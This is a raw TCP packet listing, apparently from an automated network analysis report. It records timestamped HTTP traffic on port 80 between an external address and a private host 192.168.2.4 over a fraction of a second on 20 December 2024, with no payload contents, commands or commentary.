                                                                              Dec 20, 2024 16:28:20.100812912 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.100848913 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.101386070 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.101421118 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.101520061 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.101578951 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.102202892 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.102241039 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.102359056 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.102399111 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.159257889 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.159374952 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.159487009 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.159487009 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.159576893 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.159619093 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.159687996 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.159727097 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.159863949 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.159907103 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.160559893 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.160607100 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.160706997 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.160753965 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.161353111 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.161403894 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.161775112 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.161822081 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.162198067 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.162249088 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.162275076 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.162311077 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.163005114 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.163058996 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.163180113 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.163227081 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.163851976 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.163898945 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.164041996 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.164089918 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.164707899 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.164721966 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.164805889 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.165498018 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.165543079 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.165920973 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.165981054 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.166331053 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.166371107 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.166425943 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.166464090 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.167181969 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.167197943 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.167228937 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.167258024 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.167973995 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.168021917 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.168055058 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.168091059 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.168781996 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.168831110 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.168958902 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.169001102 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.170001030 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.170052052 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.193213940 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.193233013 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.193272114 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.193284035 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.193300009 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.193325043 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.193404913 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.193455935 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.194067001 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.194081068 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.194195032 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.194844007 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.194890976 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.195210934 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.195255041 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.195693970 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.195736885 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.196125031 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.196167946 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.196496010 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.196537971 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.196635008 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.196672916 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.197377920 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.197475910 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.197990894 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.198034048 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.198152065 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.198193073 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.198448896 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.198491096 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.198973894 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.199019909 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.199203014 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.199240923 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.199799061 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.199862003 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.199898958 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.199934006 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.200611115 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.200660944 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.200689077 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.200726032 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.201471090 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.201513052 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.201541901 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.201579094 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.202271938 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.202310085 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.202538013 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.202575922 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.203094006 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.203130007 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.203181982 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.203217983 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.273426056 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.273461103 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.273509979 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.273529053 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.273760080 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.273772001 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.273806095 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.274532080 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.274581909 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.274646044 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.274678946 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.275373936 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.275422096 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.275469065 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.275511026 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.276177883 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.276221037 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.276278973 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.276319027 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.277020931 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.277069092 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.277199030 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.277235985 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.277848959 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.277893066 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.277946949 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.277985096 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.278688908 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.278734922 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.278780937 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.278815985 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.279499054 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.279536009 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.279715061 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.279747963 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.282754898 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.282798052 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.283659935 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.283678055 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.283689976 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.283701897 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.283718109 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.283730984 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.283742905 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.283749104 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.283759117 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.283767939 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.283787966 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.283807039 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.284583092 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.284631014 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.284763098 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.284801006 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.285484076 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.285516977 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.285968065 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.286015034 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.286137104 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.286173105 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.286323071 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.286384106 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.287149906 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.287199020 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.287307978 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.287353039 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.287991047 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.288027048 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.288186073 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.288218021 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.288522005 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.288556099 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.289057970 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.289093971 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.289554119 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.289598942 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.289864063 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.289910078 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.290505886 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.290541887 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.290826082 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.290859938 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.291152954 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.291187048 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.291340113 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.291373014 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.292018890 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.292054892 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.292198896 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.292234898 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.292860031 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.292901039 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.293040037 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.293075085 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.293685913 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.293749094 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.294337034 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.294410944 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.294644117 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.294656038 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.294680119 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.294698000 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.295308113 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.295346022 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.295466900 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.295509100 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.351912975 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.352018118 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.352065086 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.352097034 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.352185965 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.352199078 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.352215052 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.352233887 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.353075981 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.353128910 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.353270054 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.353308916 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.353844881 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.353888035 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.354151964 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.354183912 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.354605913 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.354654074 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.355093956 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.355132103 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.355380058 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.355418921 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.359100103 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.359112978 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.359124899 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.359136105 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.359147072 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.359159946 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.359172106 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.359183073 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.359215975 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.359231949 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.359250069 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.359714031 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.359756947 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.360214949 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.360251904 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.360579014 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.360611916 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.361232042 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.361268997 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.361924887 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.361938000 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.361958981 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.361979008 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.362102032 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.362142086 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.362806082 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.362874985 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.386379004 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.386471033 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.386483908 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.386509895 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.386658907 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.386673927 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.386702061 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.386722088 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.387368917 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.387424946 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.387932062 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.388001919 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.388293982 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.388307095 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.388339043 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.388358116 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.388989925 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.389038086 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.389543056 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.389588118 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.389900923 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.389919996 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.389938116 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.389955997 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.390733004 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.390778065 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.390928030 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.390969992 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.391485929 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.391539097 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.391598940 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.391634941 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.391658068 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.391685963 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.391712904 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.391766071 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.392188072 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.392260075 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.392364025 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.392426968 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.392910957 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.392966032 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.393089056 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.393141985 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.393708944 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.393760920 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.393831015 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.393879890 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.394565105 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.394608974 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.394896984 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.394951105 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.395288944 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.395339012 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.466720104 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.466950893 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.467149973 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.467161894 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.467186928 CET4973080192.168.2.4185.156.73.23
